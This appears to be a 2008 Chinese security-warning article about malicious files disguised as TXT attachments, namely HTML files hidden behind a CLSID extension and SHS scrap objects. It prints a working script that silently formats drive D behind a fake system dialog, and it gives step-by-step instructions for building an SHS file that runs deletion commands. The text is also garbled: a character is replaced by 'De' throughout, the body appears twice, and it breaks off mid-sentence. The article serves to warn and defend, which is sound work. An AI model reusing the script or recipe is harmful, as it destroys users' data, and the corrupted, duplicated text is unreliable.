小心三类危险的TXT文件
来源:Net作者:Net 发布时间:2008-04-20
阅读次数
什么,TXT文件也有危险?是De!TXT文件不仅有危险,而且可以是非常De危险!不过,严格说来,应该给这个所谓De“TXT”文件加个引号,因为它们是看起来是TXT文件,实则是隐藏了期真实扩展名De其它文件,但在普通人 ...
什么,TXT文件也有危险?是De!TXT文件不仅有危险,而且可以是非常De危险!不过,严格说来,应该给这个所谓De“TXT”文件加个引号,因为它们是看起来是TXT文件,实则是隐藏了期真实扩展名De其它文件,但在普通人看来它们De确是“TXT”文件!下面就让我们一起来了解一下这些危险De“TXT”文件.
一. 隐藏HTML扩展名DeTXT文件 假如您收到De邮件附件中有一个看起来是这样De文件:QQ靓号放送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它De实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联De意思.但是存成文件名De时候它并不会显现出来,您看到De就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html.那么直接打开这个文件为什么有危险呢?请看如果这个文件De内容如下: <script>
a=new ActiveXObject("WSCript.Shell");
a.run("format.com d:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
</script> 您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始格式化D盘,同时显示“Windows is configuring the system.Plase do not interrupt this process.”这样一个对话框来欺骗您.您看随意打开附件中De.txtDe危险够大了吧? 欺骗实现原理:当您双击这个伪装起来De.txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件De形式运行,这是它能运行起来De先决条件. 文件内容中De第2和第3行是它能够产生破坏作用De关键所在.其中第3行是破坏行动De执行者,在其中可以加载带有破坏性质De命令.那么第2行又是干什么De呢?您可能已经注意到了第2行里De“WSCript”,对!就是它导演了全幕,它是幕后主谋! WScript全称Windows Scripting Host,它是Win98中新加进De功能,是一种批次语言/自动执行工具——它所对应De程序“WScript.exe”是一个脚本语言解释器,位于c:\WINDOWS下,正是它使得脚本可以被执行,就象执行批处理一样.在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带De几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能. 识别及防范方法: ①这种带有欺骗性质De.txt文件显示出来De并不是文本文件De图标,它显示De是未定义文件类型De标志,这是区分它与正常TXT文件De最好方法. ②识别De另一个办法是在“按WEB页方式”查看时在“我De电脑”左面会显示出其文件名全称(如图1),此时可以看到它不是真正DeTXT文件.问题是很多初学者经验不够,老手也可能因为没留意而打开它,在这里再次提醒您,注意您收到De邮件中附件De文件名,不仅要看显示出来De扩展名,还要注意其实际显示De图标是什么.
③对于附件中别人发来De看起来是TXTDe文件,可以将它下载后用鼠标右键选择“用记事本打开”,这样看会很安全. 二. 恶意碎片文件 另一类可怕DeTXT文件是一种在Windows中被称作“碎片对象”(扩展名为“SHS”)De文件,它一般被伪装成文本文件通过电子邮件附件来传播,比方说,这个样子:QQ号码放送.txt.shs,由于真正地后缀名“SHS”不会显示出来,如果在该文件中含有诸如“format”之类De命令将非常可怕!不仅如此,以下四点原因也是其有一定危害性De原因: ①碎片对象文件De缺省图标是一个和记事本文件图标相类似De图标,很容易会被误认为是一些文本De文档,用户对它De警惕心理准备不足. ②在WindowsDe默认状态下,“碎片对象”文件De扩展名(“.SHS”)是隐藏De,即使你在“资源管理器”→“工具”→“文件夹选项”→“查看”中,把“隐藏已知文件类型De扩展名”前面De“√”去掉,“.SHS”也还是隐藏De,这是因为Windows支持双重扩展名,如“QQ号码放送.txt.shs”显示出来De名称永远是“QQ号码放送.txt”. ③即使有疑心,你用任何杀毒软件都不会找到这个文件De一点问题,因为这个文件本身就没有病毒,也不是可执行De,而且还是系统文件.你会怀疑这样De文件吗? ④这种SHS附件病毒制造起来非常容易,5分钟就可以学会,也不需要编程知识(格式化C盘De命令:“Format c:”大家都知道吧^_^). 1. 具体实例 那么,碎片对象到底对用户De计算机会造成什么威胁呢?我们一起来作个测试就明白了.以下测试环境是在Windows 2000 server中文版上进行De.我们先在硬盘上创建一个测试用De文件test.txt(我创建De位置是D:\test.txt),然后我们来制作一个能删除这个测试文件De碎片对象文件. ①先运行一个对象包装程序(packager.exe),我DeWin2000 server安装在/winnt/system32下. ②新建一个文件后,打开菜单“文件”→“导入”,这时会弹出一个文件对话框,让你选择一个文件.不用考虑,随便选择一个文件就可以了. ③然后打开“编辑”→“命令行”,在弹出De命令行输入对话框中输入“cmd.exe /c del d:\test.txt”,点“确定”. ④然后,在菜单中选择“编辑”→“复制数据包”. ⑤接着,随便在硬盘上找个地方,我就直接在桌面上了.在桌面上点击鼠标右键,在弹出菜单中选择“粘贴”,这时我们可以看到在桌面创建了一个碎片对象文件. 现在我们可以双击一下这个文件,CMD窗口一闪而过后,再到D盘看看,测试文件D:\test.txt已经被删除了!现在你该知道了,当时在对象包装中输入地命令被执行了.好危险啊,如果这条命令是要删除系统中De一个重要文件,或者是格式化命令format之类De危险命令,那该有多么De可怕! 下面让我们一起来看看这个“隐身杀手”De真正面目吧! 2. 技术原理 依照微软De解释,SHS文件是一类特殊DeOLE(Object Linking and Embedding,对象连接和嵌入)对象,可以由Word文档或Excel电子表格创建.通过选择文档中文本或图像De一块区域,然后拖放该区域到桌面上De某处,就可以创建一个
一. 隐藏HTML扩展名DeTXT文件 假如您收到De邮件附件中有一个看起来是这样De文件:QQ靓号放送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它De实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联De意思.但是存成文件名De时候它并不会显现出来,您看到De就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html.那么直接打开这个文件为什么有危险呢?请看如果这个文件De内容如下: <script>
a=new ActiveXObject("WSCript.Shell");
a.run("format.com d:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
</script> 您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始格式化D盘,同时显示“Windows is configuring the system.Plase do not interrupt this process.”这样一个对话框来欺骗您.您看随意打开附件中De.txtDe危险够大了吧? 欺骗实现原理:当您双击这个伪装起来De.txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件De形式运行,这是它能运行起来De先决条件. 文件内容中De第2和第3行是它能够产生破坏作用De关键所在.其中第3行是破坏行动De执行者,在其中可以加载带有破坏性质De命令.那么第2行又是干什么De呢?您可能已经注意到了第2行里De“WSCript”,对!就是它导演了全幕,它是幕后主谋! WScript全称Windows Scripting Host,它是Win98中新加进De功能,是一种批次语言/自动执行工具——它所对应De程序“WScript.exe”是一个脚本语言解释器,位于c:\WINDOWS下,正是它使得脚本可以被执行,就象执行批处理一样.在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带De几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能. 识别及防范方法: ①这种带有欺骗性质De.txt文件显示出来De并不是文本文件De图标,它显示De是未定义文件类型De标志,这是区分它与正常TXT文件De最好方法. ②识别De另一个办法是在“按WEB页方式”查看时在“我De电脑”左面会显示出其文件名全称(如图1),此时可以看到它不是真正DeTXT文件.问题是很多初学者经验不够,老手也可能因为没留意而打开它,在这里再次提醒您,注意您收到De邮件中附件De文件名,不仅要看显示出来De扩展名,还要注意其实际显示De图标是什么.
③对于附件中别人发来De看起来是TXTDe文件,可以将它下载后用鼠标右键选择“用记事本打开”,这样看会很安全. 二. 恶意碎片文件 另一类可怕DeTXT文件是一种在Windows中被称作“碎片对象”(扩展名为“SHS”)De文件,它一般被伪装成文本文件通过电子邮件附件来传播,比方说,这个样子:QQ号码放送.txt.shs,由于真正地后缀名“SHS”不会显示出来,如果在该文件中含有诸如“format”之类De命令将非常可怕!不仅如此,以下四点原因也是其有一定危害性De原因: ①碎片对象文件De缺省图标是一个和记事本文件图标相类似De图标,很容易会被误认为是一些文本De文档,用户对它De警惕心理准备不足. ②在WindowsDe默认状态下,“碎片对象”文件De扩展名(“.SHS”)是隐藏De,即使你在“资源管理器”→“工具”→“文件夹选项”→“查看”中,把“隐藏已知文件类型De扩展名”前面De“√”去掉,“.SHS”也还是隐藏De,这是因为Windows支持双重扩展名,如“QQ号码放送.txt.shs”显示出来De名称永远是“QQ号码放送.txt”. ③即使有疑心,你用任何杀毒软件都不会找到这个文件De一点问题,因为这个文件本身就没有病毒,也不是可执行De,而且还是系统文件.你会怀疑这样De文件吗? ④这种SHS附件病毒制造起来非常容易,5分钟就可以学会,也不需要编程知识(格式化C盘De命令:“Format c:”大家都知道吧^_^). 1. 具体实例 那么,碎片对象到底对用户De计算机会造成什么威胁呢?我们一起来作个测试就明白了.以下测试环境是在Windows 2000 server中文版上进行De.我们先在硬盘上创建一个测试用De文件test.txt(我创建De位置是D:\test.txt),然后我们来制作一个能删除这个测试文件De碎片对象文件. ①先运行一个对象包装程序(packager.exe),我DeWin2000 server安装在/winnt/system32下. ②新建一个文件后,打开菜单“文件”→“导入”,这时会弹出一个文件对话框,让你选择一个文件.不用考虑,随便选择一个文件就可以了. ③然后打开“编辑”→“命令行”,在弹出De命令行输入对话框中输入“cmd.exe /c del d:\test.txt”,点“确定”. ④然后,在菜单中选择“编辑”→“复制数据包”. ⑤接着,随便在硬盘上找个地方,我就直接在桌面上了.在桌面上点击鼠标右键,在弹出菜单中选择“粘贴”,这时我们可以看到在桌面创建了一个碎片对象文件. 现在我们可以双击一下这个文件,CMD窗口一闪而过后,再到D盘看看,测试文件D:\test.txt已经被删除了!现在你该知道了,当时在对象包装中输入地命令被执行了.好危险啊,如果这条命令是要删除系统中De一个重要文件,或者是格式化命令format之类De危险命令,那该有多么De可怕! 下面让我们一起来看看这个“隐身杀手”De真正面目吧! 2. 技术原理 依照微软De解释,SHS文件是一类特殊DeOLE(Object Linking and Embedding,对象连接和嵌入)对象,可以由Word文档或Excel电子表格创建.通过选择文档中文本或图像De一块区域,然后拖放该区域到桌面上De某处,就可以创建一个
上一篇: 在Yahoo IM补漏前不要和陌生人视频聊天(图)
下一篇: 一秒识破自己机器里是否有QQ木马的存在
关注此文读者还看过
文章关注度排行
